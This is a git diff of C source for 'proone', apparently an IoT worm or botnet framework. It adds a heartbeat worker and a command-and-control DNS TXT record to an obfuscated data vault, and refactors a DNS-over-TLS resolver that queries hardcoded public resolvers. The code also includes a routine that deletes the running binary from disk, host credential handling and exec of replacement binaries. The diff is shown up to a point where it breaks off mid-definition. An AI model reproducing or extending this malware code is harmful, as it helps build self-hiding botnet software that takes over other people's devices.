--git a/src/htbt.h b/src/htbt.h new file mode 100644 index 0000000..edb6cda --- /dev/null +++ b/src/htbt.h @@ -0,0 +1,14 @@ +#pragma once +#include "pth.h" +#include "resolv.h" + + +typedef struct prne_htbt prne_htbt_t; +struct prne_htbt; + + +prne_htbt_t *prne_alloc_htbt_worker ( + prne_worker_t *w, + pth_t sigterm_pth, + prne_resolv_t *resolv, // optional + mbedtls_ctr_drbg_context *ctr_drbg); diff --git a/src/proone-mkdvault.c b/src/proone-mkdvault.c index 1ed8b0e..fcacadb 100644 --- a/src/proone-mkdvault.c +++ b/src/proone-mkdvault.c @@ -2,6 +2,7 @@ #include "dvault.h" #include "util_rt.h" #include "imap.h" +#include "resolv.h" #include "proone_conf/x509.h" #include <stdio.h> @@ -63,7 +64,7 @@ static void assert_errno (const bool expr, const char *msg) { } static void assert_dvault ( - const prne_dvault_mask_result_t *ret, + const prne_dvault_mask_result_t *ret, prne_data_key_t key) { if (ret->result != PRNE_DVAULT_MASK_OK) { @@ -130,8 +131,8 @@ int main (void) { &rnd, mbedtls_entropy_func, &ent, - (unsigned char*)PRNE_BUILD_ENTROPY, - sizeof(PRNE_BUILD_ENTROPY)); + NULL, + 0); assert_mbedtls(callret == 0, callret, "mbedtls_ctr_drbg_seed()"); gen_mask(mask); @@ -149,6 +150,7 @@ int main (void) { add_bin(PRNE_DATA_KEY_X509_C_KEY, PRNE_X509_C_KEY); add_bin(PRNE_DATA_KEY_RESOLV_NS_IPV4, PRNE_RESOLV_NS_POOL_IPV4); add_bin(PRNE_DATA_KEY_RESOLV_NS_IPV6, PRNE_RESOLV_NS_POOL_IPV6); + add_cstr(PRNE_DATA_KEY_CNC_TXT_REC, PRNE_CNC_TXT_REC); pos += NB_PRNE_DATA_KEY * sizeof(uint16_t); @@ -156,7 +158,7 @@ int main (void) { for (prne_data_key_t i = 0; i < NB_PRNE_DATA_KEY; i += 1) { uint8_t salt; const size_t avail = UINT16_MAX - pos; - + assert_plain(ENTRIES[i].set, "Null entry found."); callret = mbedtls_ctr_drbg_random(&rnd, &salt, 1); @@ -184,7 +186,7 @@ int main (void) { memcpy(ptr, mask, 256); ptr += 256; ptr_offsets = ptr; - + for (prne_data_key_t i = 0; i < NB_PRNE_DATA_KEY; i += 1) { ptr[0] = (uint8_t)((ENTRIES[i].pos & 0xFF00) >> 8); ptr[1] = (uint8_t)((ENTRIES[i].pos & 0x00FF) >> 0); @@ -209,10 +211,10 @@ int main (void) { memcpy(m_test, m_out, pos); for (size_t i = 0; i < 3; i += 1) { prne_init_dvault(m_test); - + for (prne_data_key_t i = 0; i < NB_PRNE_DATA_KEY; i += 1) { size_t size; - + switch (ENTRIES[i].type) { case PRNE_DATA_TYPE_BIN: ptr_rd = prne_dvault_get_bin(i, &size); diff --git a/src/proone-resolv b/src/proone-resolv Binary files differnew file mode 100755 index 0000000..1d7144a --- /dev/null +++ b/src/proone-resolv diff --git a/src/proone-resolv.c b/src/proone-resolv.c index 68b5dcf..73198fe 100644 --- a/src/proone-resolv.c +++ b/src/proone-resolv.c @@ -54,11 +54,11 @@ static bool printable_str (const char *str, const size_t n) { } } return true; -} +} static void proc_prompt_line (char *line, const size_t line_len) { static regmatch_t rm[3]; - + if (regexec(&prmpt_regex, line, 3, rm, 0) == 0) { prne_resolv_prm_t *prm = (prne_resolv_prm_t*)prne_malloc(sizeof(prne_resolv_prm_t), 1); char *verb, *obj; @@ -102,7 +102,7 @@ static void proc_prompt_line (char *line, const size_t line_len) { static void *stdin_wkr_entry (void *ctx) { while (main_flag) { - static char line_buf[512]; + static char line_buf[512]; static size_t line_buf_cnt = 0; static bool missed_line = false; int read_len; @@ -138,7 +138,7 @@ static void *stdin_wkr_entry (void *ctx) { line_buf_cnt -= consumed; } else { - line_buf_cnt = 0; + line_buf_cnt = 0; if (!missed_line) { fprintf(stderr, "* Line too long!\n"); } @@ -153,7 +153,7 @@ static void *stdin_wkr_entry (void *ctx) { break; } - fflush(stderr); + fflush(stderr); } return NULL; @@ -170,7 +170,7 @@ static void *stdout_wkr_entry (void *ctx) { cur = prm_list.head; while (cur != NULL) { prm = (prne_resolv_prm_t*)cur->element; - + if (prm->fut != NULL && prm->fut->qr != PRNE_RESOLV_QR_NONE) { static char ntop_buf[INET6_ADDRSTRLEN]; const char *qr_str, *status_str; @@ -259,9 +259,9 @@ int main (void) { prne_assert(regcomp(&empty_line_regex, "^\\s+$", REG_NOSUB | REG_EXTENDED) == 0); prne_mbedtls_entropy_init(&entropy); mbedtls_ctr_drbg_init(&rnd); - prne_assert(mbedtls_ctr_drbg_seed(&rnd, mbedtls_entropy_func, &entropy, (const uint8_t*)PRNE_BUILD_ENTROPY, sizeof(PRNE_BUILD_ENTROPY) - 1) == 0); + prne_assert(mbedtls_ctr_drbg_seed(&rnd, mbedtls_entropy_func, &entropy, NULL, 0) == 0); prne_init_llist(&prm_list); - + resolv = prne_alloc_resolv(&wkr_arr[0], &rnd, PRNE_RESOLV_DEF_IPV4_POOL, PRNE_RESOLV_DEF_IPV6_POOL); prne_assert(resolv != NULL); diff --git a/src/proone.c b/src/proone.c index 68b80cb..cc3ae25 100644 --- a/src/proone.c +++ b/src/proone.c @@ -23,7 +23,6 @@ #include "util_rt.h" #include "dvault.h" #include "llist.h" -// #include "htbt-worker.h" #include "mbedtls.h" @@ -35,58 +34,67 @@ sigset_t ss_exit, ss_all; static prne_worker_t wkr_arr[2]; static size_t wkr_cnt = 0; -static void alloc_workers (void) { - for (size_t i = 0; i < sizeof(wkr_arr)/sizeof(prne_worker_t); i += 1) { - prne_init_worker(wkr_arr + i); - } - { - prne_resolv_ns_pool_t pool4, pool6; +static void alloc_resolv (void) { + prne_resolv_ns_pool_t pool4, pool6; + size_t i, len, cnt; + const uint8_t *bin; - prne_resolv_init_ns_pool(&pool4); - prne_resolv_init_ns_pool(&pool6); + prne_resolv_init_ns_pool(&pool4); + prne_resolv_init_ns_pool(&pool6); - do { - size_t i, len, cnt; - const uint8_t *bin; + bin = prne_dvault_get_bin(PRNE_DATA_KEY_RESOLV_NS_IPV4, &len); + prne_dbgast(len != 0 && len % 16 == 0); + cnt = len * 16; - bin = prne_dvault_get_bin(PRNE_DATA_KEY_RESOLV_NS_IPV4, &len); - prne_dbgast(len != 0 && len % 16 == 0); - cnt = len * 16; + if (!prne_resolv_alloc_ns_pool(&pool4, cnt)) { + goto END; + } + for (i = 0; i < cnt; i += 1) { + memcpy(pool4.arr[i].addr.addr, bin + i * 16, 16); + pool4.arr[i].addr.ver = PRNE_IPV_4; + pool4.arr[i].port = 853; + } - if (!prne_resolv_alloc_ns_pool(&pool4, cnt)) { - break; - } - for (i = 0; i < cnt; i += 1) { - memcpy(pool4.arr[i].addr.addr, bin + i * 16, 16); - pool4.arr[i].addr.ver = PRNE_IPV_4; - pool4.arr[i].port = 853; - } + bin = prne_dvault_get_bin(PRNE_DATA_KEY_RESOLV_NS_IPV6, &len); + prne_dbgast(len != 0 && len % 16 == 0); + cnt = len * 16; - bin = prne_dvault_get_bin(PRNE_DATA_KEY_RESOLV_NS_IPV6, &len); - prne_dbgast(len != 0 && len % 16 == 0); - cnt = len * 16; + if (!prne_resolv_alloc_ns_pool(&pool6, cnt)) { + goto END; + } + for (i = 0; i < cnt; i += 1) { + memcpy(pool6.arr[i].addr.addr, bin + i * 16, 16); + pool6.arr[i].addr.ver = PRNE_IPV_6; + pool6.arr[i].port = 853; + } - if (!prne_resolv_alloc_ns_pool(&pool6, cnt)) { - break; - } - for (i = 0; i < cnt; i += 1) { - memcpy(pool6.arr[i].addr.addr, bin + i * 16, 16); - pool6.arr[i].addr.ver = PRNE_IPV_6; - pool6.arr[i].port = 853; - } - - prne_g.resolv = prne_alloc_resolv(wkr_arr + 0, &prne_g.ssl.rnd, pool4, pool6); - if (prne_g.resolv != NULL) { - wkr_cnt += 1; - pool4.ownership = false; - pool6.ownership = false; - } - } while (false); + prne_g.resolv = prne_alloc_resolv( + wkr_arr + wkr_cnt, + &prne_g.ssl.rnd, + pool4, pool6); + if (prne_g.resolv != NULL) { + wkr_cnt += 1; + pool4.ownership = false; + pool6.ownership = false; + } + +END: + prne_dvault_reset(); + prne_resolv_free_ns_pool(&pool4); + prne_resolv_free_ns_pool(&pool6); +} + +static void alloc_htbt (void) { + // TODO +} - prne_resolv_free_ns_pool(&pool4); - prne_resolv_free_ns_pool(&pool6); +static void alloc_workers (void) { + for (size_t i = 0; i < sizeof(wkr_arr)/sizeof(prne_worker_t); i += 1) { + prne_init_worker(wkr_arr + i); } + alloc_resolv(); + alloc_htbt(); } static void free_workers (void) { @@ -96,9 +104,30 @@ static void free_workers (void) { prne_g.resolv = NULL; } -static void seed_ssl_rnd (const uint8_t *seed, const size_t slen) { - if (mbedtls_ctr_drbg_seed(&prne_g.ssl.rnd, mbedtls_entropy_func, &prne_g.ssl.entpy, seed, slen) != 0) { - mbedtls_ctr_drbg_seed(&prne_g.ssl.rnd, mbedtls_entropy_func, &prne_g.ssl.entpy, NULL, 0); +static void seed_ssl_rnd (const bool use_bent) { + static const uint8_t BENTPY[] = PRNE_BUILD_ENTROPY; + static const size_t BENTPY_SIZE = sizeof(BENTPY); + int mret; + + if (use_bent) { + mret = mbedtls_ctr_drbg_seed( + &prne_g.ssl.rnd, + mbedtls_entropy_func, + &prne_g.ssl.entpy, + BENTPY, + BENTPY_SIZE); + } + else { + mret = -1; + } + + if (mret != 0) { + mbedtls_ctr_drbg_seed( + &prne_g.ssl.rnd, + mbedtls_entropy_func, + &prne_g.ssl.entpy, + NULL, + 0); } } @@ -117,7 +146,7 @@ static int proone_main (void) { #ifndef PRNE_DEBUG signal(SIGPIPE, SIG_IGN); #endif - seed_ssl_rnd((const uint8_t*)PRNE_BUILD_ENTROPY, sizeof(PRNE_BUILD_ENTROPY)); + seed_ssl_rnd(true); alloc_workers(); for (size_t i = 0; i < wkr_cnt; i += 1) { @@ -133,6 +162,10 @@ static int proone_main (void) { } while (reaped > 0); continue; } + else if (caught_sig == SIGINT) { + // Probably Ctrl + C. Wait for the parent to send SIGTERM. + continue; + } } while (false); sigprocmask(SIG_UNBLOCK, &ss_exit, NULL); @@ -156,8 +189,8 @@ static void delete_myself (const char *arg0) { static const char *proc_path = "/proc/self/exe"; struct stat st; const char *path_to_unlink = NULL; - char *path_buf = NULL; - + char *path_buf = NULL; + // get real path of myself if (lstat(proc_path, &st) == 0 && (path_buf = (char*)prne_malloc(1, st.st_size + 1)) != NULL && readlink(proc_path, path_buf, st.st_size) == st.st_size) { path_buf[st.st_size] = 0; @@ -267,7 +300,7 @@ static void init_proone (const char *self) { prne_g.dvault_size = (uint_fast16_t)prne_g.m_exec[prne_g.exec_size + 0] << 8 | (uint_fast16_t)prne_g.m_exec[prne_g.exec_size + 1] << 0; - binarch_size = + binarch_size = (uint_fast32_t)prne_g.m_exec[prne_g.exec_size + 4] << 24 | (uint_fast32_t)prne_g.m_exec[prne_g.exec_size + 5] << 16 | (uint_fast32_t)prne_g.m_exec[prne_g.exec_size + 6] << 8 | @@ -279,7 +312,7 @@ static void init_proone (const char *self) { binarch_ofs = prne_salign_next( dvault_ofs + prne_g.dvault_size, PRNE_BIN_ALIGNMENT); - + // Load dvault prne_assert(dvault_ofs + prne_g.dvault_size <= (size_t)file_size); prne_g.m_exec_dvault = prne_g.m_exec + dvault_ofs; @@ -376,20 +409,24 @@ static void load_ssl_conf (void) { mbedtls_ssl_conf_verify( &prne_g.s_ssl.conf, prne_mbedtls_x509_crt_verify_cb, - NULL); + NULL); } if (prne_g.c_ssl.ready) { mbedtls_ssl_conf_ca_chain( - &prne_g.c_ssl.conf, - &prne_g.ssl.ca, + &prne_g.c_ssl.conf, + &prne_g.ssl.ca, NULL); mbedtls_ssl_conf_authmode( - &prne_g.c_ssl.conf, + &prne_g.c_ssl.conf, MBEDTLS_SSL_VERIFY_REQUIRED); mbedtls_ssl_conf_verify( - &prne_g.c_ssl.conf, + &prne_g.c_ssl.conf, prne_mbedtls_x509_crt_verify_cb, - NULL); + NULL); + mbedtls_ssl_conf_min_version( + &prne_g.c_ssl.conf, + MBEDTLS_SSL_MAJOR_VERSION_3, + MBEDTLS_SSL_MINOR_VERSION_0); } #undef BREAKIF_ERR } @@ -430,7 +467,7 @@ static bool init_shared_global (void) { fname = prne_dvault_get_cstr(PRNE_DATA_KEY_PROC_LIM_SHM, NULL); do { - fd = shm_open(fname, O_RDWR, 0600); + fd = shm_open(fname, O_RDWR, 0600); if (fd >= 0) { if (!try_lock_file(fd)) { ret = false; @@ -512,7 +549,7 @@ static void init_ids (void) { if (fd < 0) { break; } - + if (read(fd, line, 36) != 36) { break; } @@ -536,14 +573,14 @@ static void set_host_credential (const char *str) { static void run_ny_bin (void) { sigset_t old_ss; bool has_ss; - + // Clean the house for the new image. // Free any resource that survives exec() call. deinit_shared_global(); has_ss = sigprocmask(SIG_UNBLOCK, &ss_all, &old_ss) == 0; // TODO - + // exec() failed // Restore previous condifion if (has_ss) { @@ -590,7 +627,7 @@ int main (const int argc, const char **args) { /* inits that need outside resources. IN THIS ORDER! */ load_ssl_conf(); - seed_ssl_rnd(NULL, 0); + seed_ssl_rnd(false); init_ids(); if (!init_shared_global()) { prne_dbgpf("*** Another instance detected.\n"); @@ -605,12 +642,13 @@ int main (const int argc, const char **args) { if (argc > 1) { set_host_credential(args[1]); } - + // done with the terminal - prne_close(STDIN_FILENO); - prne_close(STDOUT_FILENO); + close(STDIN_FILENO); #ifndef PRNE_DEBUG - prne_close(STDERR_FILENO); + // Some stupid library can use these + close(STDOUT_FILENO); + close(STDERR_FILENO); #endif sigprocmask(SIG_BLOCK, &ss_all, NULL); @@ -624,7 +662,7 @@ int main (const int argc, const char **args) { static bool has_ny_bin; static int caught_signal = 0; - status = 0; // TODO FIXME: libc bug? + prne_dbgpf("* Child: %d\n", prne_g.child_pid); do { prne_assert(sigwait(&ss_all, &caught_signal) == 0); @@ -632,10 +670,10 @@ int main (const int argc, const char **args) { switch (caught_signal) { case SIGINT: case SIGTERM: - // pass the signal to the child + // Exit requested. Notify the child and wait for it to exit. loop = false; sigprocmask(SIG_UNBLOCK, &ss_exit, NULL); - kill(prne_g.child_pid, caught_signal); + kill(prne_g.child_pid, SIGTERM); continue; case SIGCHLD: prne_assert(waitpid(prne_g.child_pid, &status, WNOHANG) == prne_g.child_pid); @@ -650,10 +688,10 @@ int main (const int argc, const char **args) { } if (WIFEXITED(status)) { - prne_dbgpf("* child process %d exited with code %d!\n", prne_g.child_pid, WEXITSTATUS(status)); + prne_dbgpf("* Child process %d exited with code %d!\n", prne_g.child_pid, WEXITSTATUS(status)); if (WEXITSTATUS(status) == 0) { if (has_ny_bin) { - prne_dbgpf("* detected new bin. Attempting to exec()\n"); + prne_dbgpf("* Detected new bin. Attempting to exec()\n"); run_ny_bin(); // run_ny_bin() returns if fails prne_dbgperr("** run_ny_bin() failed"); @@ -662,7 +700,7 @@ int main (const int argc, const char **args) { } } else if (WIFSIGNALED(status)) { - prne_dbgpf("** child process %d received signal %d!\n", prne_g.child_pid, WTERMSIG(status)); + prne_dbgpf("** Child process %d received signal %d!\n", prne_g.child_pid, WTERMSIG(status)); } if (has_ny_bin) { @@ -677,7 +715,7 @@ int main (const int argc, const char **args) { prne_g.shm_fd = -1; prne_g.is_child = true; prne_g.child_start = prne_gettime(CLOCK_MONOTONIC); - + exit_code = proone_main(); break; } @@ -687,7 +725,7 @@ int main (const int argc, const char **args) { END: prne_free_bin_archive(&prne_g.bin_archive); prne_g.bin_ready = false; - + mbedtls_ssl_config_free(&prne_g.s_ssl.conf); mbedtls_x509_crt_free(&prne_g.s_ssl.crt); mbedtls_pk_free(&prne_g.s_ssl.pk); diff --git a/src/protocol.c b/src/protocol.c index 7f30adb..bcbc4d1 100644 --- a/src/protocol.c +++ b/src/protocol.c @@ -1,5 +1,6 @@ #include "protocol.h" #include "util_rt.h" +#include "endian.h" #include "dvault.h" #include <string.h> @@ -40,7 +41,7 @@ const char *prne_arch_tostr (const prne_arch_t x) { case PRNE_ARCH_ARCEB: return "arceb"; } - + return NULL; } @@ -116,7 +117,7 @@ bool prne_alloc_host_cred (prne_host_cred_t *hc, const uint8_t id_len, const uin id = prne_alloc_str(id_len); pw = prne_alloc_str(pw_len); - if (id == NULL || pw == NULL) { + if (id == NULL || pw == NULL) { prne_free(id); prne_free(pw); return false; @@ -412,7 +413,7 @@ prne_htbt_ser_rc_t prne_htbt_ser_status (uint8_t *mem, const size_t mem_len, siz if (mem_len < *actual) { return PRNE_HTBT_SER_RC_MORE_BUF; } - + mem[0] = (uint8_t)in->code; mem[1] = prne_getmsb32(in->err, 0); mem[2] = prne_getmsb32(in->err, 1); @@ -528,7 +529,7 @@ prne_htbt_ser_rc_t prne_htbt_ser_bin_meta (uint8_t *mem, const size_t mem_len, s prne_htbt_ser_rc_t prne_htbt_dser_msg_head (const uint8_t *data, const size_t len, size_t *actual, prne_htbt_msg_head_t *out) { *actual = 3; - + if (len < *actual) { return PRNE_HTBT_SER_RC_MORE_BUF; } @@ -645,7 +646,7 @@ prne_htbt_ser_rc_t prne_htbt_dser_cmd (const uint8_t *data, const size_t len, si if (len < *actual) { return PRNE_HTBT_SER_RC_MORE_BUF; } - + args_len = prne_recmb_msb16(0x0F & data[0], data[1]); *actual += args_len; @@ -14,7 +14,7 @@ void prne_init_worker (prne_worker_t *w) { void prne_free_worker (prne_worker_t *w) { if (w->ctx != NULL) { - prne_assert(w->free_ctx != NULL); + prne_assert(w->free_ctx != NULL); w->free_ctx(w->ctx); w->ctx = NULL; } @@ -46,22 +46,16 @@ bool prne_pth_cond_timedwait (prne_pth_cv_t *cv, const struct timespec *timeout, if (timeout != NULL) { ev = pth_event(PTH_EVENT_TIME, pth_timeout(timeout->tv_sec, timeout->tv_nsec / 1000)); - if (ev == NULL) { - return -1; - } + prne_assert(ev != NULL); } else { ev = NULL; } - if (pth_mutex_acquire(cv->lock, FALSE, NULL)) { - ret = pth_cond_await(cv->cond, cv->lock, ev); - prne_assert(pth_mutex_release(cv->lock)); - } - else { - ret = false; - } - + prne_assert(pth_mutex_acquire(cv->lock, FALSE, NULL)); + ret = pth_cond_await(cv->cond, cv->lock, ev) != 0; + prne_assert(pth_mutex_release(cv->lock)); + if (ev != NULL && pth_event_occurred(ev)) { ret = true; reached = true; diff --git a/src/resolv.c b/src/resolv.c index e839d59..c382aad 100644 --- a/src/resolv.c +++ b/src/resolv.c @@ -111,12 +111,7 @@ static const struct timespec RESOLV_QUERY_TIMEOUT = { 15, 0 }; // 15s static const struct timespec RESOLV_SCK_OP_TIMEOUT = { 10, 0 }; // 10s static const struct timespec RESOLV_SCK_IDLE_TIMEOUT = { 15, 0 }; // 15s static const struct timespec RESOLV_SCK_CLOSE_TIMEOUT = { 1, 0 }; // 1s -static const size_t RESOLV_PIPELINE_SIZE = 4; - -static int resolv_set_cmn_fd_opt (const int fd) { - // TODO: no FD_CLOEXEC - return fcntl(fd, F_SETFL, O_NONBLOCK) == 0 ? fcntl(fd, F_SETFD, FD_CLOEXEC) : -1; -} +static const size_t RESOLV_PIPELINE_SIZE = 4; static void resolv_free_q_ent (query_entry_t *q_ent) { if (q_ent == NULL) { @@ -350,7 +345,6 @@ static void resolv_close_sck (prne_resolv_t *ctx, const struct timespec *pause, } static bool resolv_ensure_act_dns_fd (prne_resolv_t *ctx) { - static const int ov_nodelay = 1; static socklen_t optval_len = sizeof(int); size_t i; struct pollfd pfs[2]; @@ -358,42 +352,48 @@ static bool resolv_ensure_act_dns_fd (prne_resolv_t *ctx) { const struct timespec *err_sleep = NULL; bool ret = false; - pfs[0].fd = socket(AF_INET6, SOCK_STREAM, 0); - pfs[1].fd = socket(AF_INET, SOCK_STREAM, 0); - pfs[0].events = POLLOUT; - pfs[1].events = POLLOUT; - if (pfs[0].fd >= 0) { - setsockopt(pfs[0].fd, SOL_TCP, TCP_NODELAY, &ov_nodelay, sizeof(int)); - if (resolv_set_cmn_fd_opt(pfs[0].fd) < 0) { - prne_close(pfs[0].fd); - pfs[0].fd = -1; - } - else { - struct sockaddr_in6 addr; + { + static const int ov_nodelay = 1; + static const int ARR_DOMAIN[] = { AF_INET6, AF_INET }; + static const socklen_t ARR_SL[] = { + sizeof(struct sockaddr_in6), + sizeof(struct sockaddr_in) }; + struct sockaddr_in6 sa6; + struct sockaddr_in sa4; + struct sockaddr *arr_sa[] = { + (struct sockaddr*)&sa6, + (struct sockaddr*)&sa4 }; + + memzero(&sa6, sizeof(sa6)); + memzero(&sa4, sizeof(sa4)); + prne_net_ep_tosin6(ctx->nspool6.arr + ctx->ptr_nspool6, &sa6); + prne_net_ep_tosin4(ctx->nspool4.arr + ctx->ptr_nspool4, &sa4); - memzero(&addr, sizeof(addr)); - prne_net_ep_tosin6(ctx->nspool6.arr + ctx->ptr_nspool4, &addr); - if (connect(pfs[0].fd, (const struct sockaddr*)&addr, sizeof(addr)) < 0 && errno != EINPROGRESS) { - prne_close(pfs[0].fd); - pfs[0].fd = -1; + for (i = 0; i < 2; i += 1) { + pfs[i].fd = socket(ARR_DOMAIN[i], SOCK_STREAM, 0); + pfs[i].events = POLLOUT; + if (pfs[i].fd < 0) { + goto ERR; } - } - } - if (pfs[1].fd >= 0) { - setsockopt(pfs[1].fd, SOL_TCP, TCP_NODELAY, &ov_nodelay, sizeof(int)); - if (resolv_set_cmn_fd_opt(pfs[1].fd) < 0) { - prne_close(pfs[1].fd); - pfs[1].fd = -1; - } - else { - struct sockaddr_in addr; - - memzero(&addr, sizeof(addr)); - prne_net_ep_tosin4(ctx->nspool4.arr + ctx->ptr_nspool6, &addr); - if (connect(pfs[1].fd, (const struct sockaddr*)&addr, sizeof(addr)) < 0 && errno != EINPROGRESS) { - prne_close(pfs[1].fd); - pfs[1].fd = -1; + if (fcntl(pfs[i].fd, F_SETFL, O_NONBLOCK) != 0) { + goto ERR; } + setsockopt( + pfs[i].fd, + SOL_TCP, + TCP_NODELAY, + &ov_nodelay, + sizeof(int)); + if (connect(pfs[i].fd, arr_sa[i], ARR_SL[i]) < 0 && + errno != EINPROGRESS) + { + goto ERR; + } + + continue; + ERR: + prne_close(pfs[i].fd); + pfs[i].fd = -1; } } @@ -582,7 +582,7 @@ static int resolv_mapped_qname_cmp (prne_imap_t *map, const uint8_t *a, const ui ret = 1; break; } - + p[0] += 1; p[1] += 1; } while (true); @@ -629,7 +629,7 @@ static bool resolv_proc_dns_msg (prne_resolv_t *ctx, const uint8_t *data, const // ID { const prne_imap_tuple_t *tpl; - + qid = ((uint16_t)data[0] << 8) | (uint16_t)data[1]; tpl = prne_imap_lookup(&ctx->qid_map, qid); ret = tpl != NULL; @@ -647,7 +647,7 @@ static bool resolv_proc_dns_msg (prne_resolv_t *ctx, const uint8_t *data, const else { qent = NULL; } - prne_imap_erase(&ctx->qid_map, qid); + prne_imap_erase(&ctx->qid_map, qid); } // QR if ((data[2] & 0x80) == 0) { @@ -709,7 +709,7 @@ static bool resolv_proc_dns_msg (prne_resolv_t *ctx, const uint8_t *data, const *err_flag = true; goto END; } - + p += 4; // decode answer RRs for (i = 0; i < ancount; i += 1) { @@ -747,7 +747,7 @@ static bool resolv_proc_dns_msg (prne_resolv_t *ctx, const uint8_t *data, const loop_cnt = 2; break; case PRNE_RESOLV_RTYPE_CNAME: - case PRNE_RESOLV_RTYPE_MX: + case PRNE_RESOLV_RTYPE_MX: case PRNE_RESOLV_RTYPE_NS: case PRNE_RESOLV_RTYPE_PTR: loop_cnt = 1; @@ -826,7 +826,7 @@ QNAME_START: rr_tuple_t *tpl; qent->fut.rr = (prne_resolv_rr_t*)prne_malloc(sizeof(prne_resolv_rr_t), ret_list.size); - if (qent->fut.rr == NULL) { + if (qent->fut.rr == NULL) { qr = PRNE_RESOLV_QR_ERR; err = errno; goto END; @@ -856,7 +856,7 @@ QNAME_START: } else { qent->fut.rr[i].rd_data = NULL; - qent->fut.rr[i].rd_len = 0; + qent->fut.rr[i].rd_len = 0; } i += 1; @@ -865,7 +865,7 @@ QNAME_START: } qr = PRNE_RESOLV_QR_OK; - + END: cur = rr_list.head; while (cur != NULL) { @@ -905,7 +905,7 @@ static void resolv_write_dns_msg (query_entry_t *qent, uint8_t *mem) { // QR: 0, Opcode: 0, AA:0, TC: 0, RD: 1, RA: 0, Z: 0, RCODE: 0 mem[2] = 0x01; mem[3] = 0x00; - // QDCOUNT: 1 + // QDCOUNT: 1 mem[4] = 0x00; mem[5] = 0x01; // ANCOUNT, NSCOUNT, ARCOUNT: 0 @@ -1028,7 +1028,7 @@ LOOP: else { pfd_events = POLLIN; } - + if (!resolv_ensure_conn(ctx)) { goto LOOP; } @@ -1131,7 +1131,7 @@ LOOP: static void resolv_proc_close (prne_resolv_t *ctx) { int pollret; - + do { switch (mbedtls_ssl_close_notify(&ctx->ssl.ctx)) { case MBEDTLS_ERR_SSL_WANT_READ: @@ -1203,6 +1203,7 @@ static void *resolv_wkr_entry (void *p) { if (ctx->act_sck_pfd.fd >= 0) { ev = pth_event(PTH_EVENT_TIME, pth_timeout(RESOLV_SCK_IDLE_TIMEOUT.tv_sec, 0)); + prne_assert(ev != NULL); } else { ev = NULL; @@ -1218,7 +1219,7 @@ static void *resolv_wkr_entry (void *p) { prne_assert(pth_mutex_release(&ctx->lock)); if (sck_close) { - resolv_proc_close(ctx); + resolv_proc_close(ctx); } resolv_proc_q(ctx); } @@ -1287,7 +1288,7 @@ bool prne_resolv_prm_gethostbyname (prne_resolv_t *wkr, const char *name, const bool ret; query_entry_t *q_ent; prne_resolv_query_type_t qt; - + switch (ipv) { case PRNE_IPV_4: qt = PRNE_RESOLV_QT_A; break; case PRNE_IPV_6: qt = PRNE_RESOLV_QT_AAAA; break; @@ -1359,7 +1360,7 @@ bool prne_resolv_alloc_ns_pool (prne_resolv_ns_pool_t *pool, const size_t cnt) { pool->cnt = cnt; pool->ownership = true; memzero(pool->arr, cnt * sizeof(prne_net_endpoint_t)); - + return true; } @@ -1426,7 +1427,7 @@ const char *prne_resolv_rcode_tostr (const prne_resolv_rcode_t rc) { case PRNE_RESOLV_RCODE_SERVFAIL: return "SERVFAIL"; case PRNE_RESOLV_RCODE_NXDOMAIN: return "NXDOMAIN"; case PRNE_RESOLV_RCODE_NOTIMP: return "NOTIMP"; - case PRNE_RESOLV_RCODE_REFUSED: return "REFUSED"; + case PRNE_RESOLV_RCODE_REFUSED: return "REFUSED"; } return NULL; } diff --git a/src/resolv.h b/src/resolv.h index c62c642..44a2be8 100644 --- a/src/resolv.h +++ b/src/resolv.h @@ -19,7 +19,7 @@ typedef uint16_t prne_resolv_rcode_t; typedef enum { PRNE_RESOLV_QR_NONE = -1, - + PRNE_RESOLV_QR_OK, PRNE_RESOLV_QR_ERR, PRNE_RESOLV_QR_PRO_ERR, @@ -68,6 +68,60 @@ struct prne_resolv_rr { uint16_t rd_len; }; +#define PRNE_RESOLV_NS_IPV4_GOOGLE_A\ + 0x8, 0x8, 0x8, 0x8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 +#define PRNE_RESOLV_NS_IPV4_GOOGLE_B\ + 0x8, 0x8, 0x4, 0x4, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 +#define PRNE_RESOLV_NS_IPV4_CLOUDFLARE_A\ + 0x1, 0x1, 0x1, 0x1, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 +#define PRNE_RESOLV_NS_IPV4_CLOUDFLARE_B\ + 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 +#define PRNE_RESOLV_NS_IPV4_QUAD9_A\ + 0x9, 0x9, 0x9, 0xa, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 +#define PRNE_RESOLV_NS_IPV4_QUAD9_B\ + 0x95, 0x70, 0x70, 0xa, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 +#define PRNE_RESOLV_NS_IPV4_CLEANBROWSING_A\ + 0xb9, 0xe4, 0xa8, 0x9, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 +#define PRNE_RESOLV_NS_IPV4_CLEANBROWSING_B\ + 0xb9, 0xe4, 0xa9, 0x9, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 +#define PRNE_RESOLV_NS_POOL_IPV4 {\ + PRNE_RESOLV_NS_IPV4_GOOGLE_A,\ + PRNE_RESOLV_NS_IPV4_GOOGLE_B,\ + PRNE_RESOLV_NS_IPV4_CLOUDFLARE_A,\ + PRNE_RESOLV_NS_IPV4_CLOUDFLARE_B,\ + PRNE_RESOLV_NS_IPV4_QUAD9_A,\ + PRNE_RESOLV_NS_IPV4_QUAD9_B,\ + PRNE_RESOLV_NS_IPV4_CLEANBROWSING_A,\ + PRNE_RESOLV_NS_IPV4_CLEANBROWSING_B\ +} + +#define PRNE_RESOLV_NS_IPV6_GOOGLE_A\ + 0x20, 0x1, 0x48, 0x60, 0x48, 0x60, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x88, 0x88 +#define PRNE_RESOLV_NS_IPV6_GOOGLE_B\ + 0x20, 0x1, 0x48, 0x60, 0x48, 0x60, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x88, 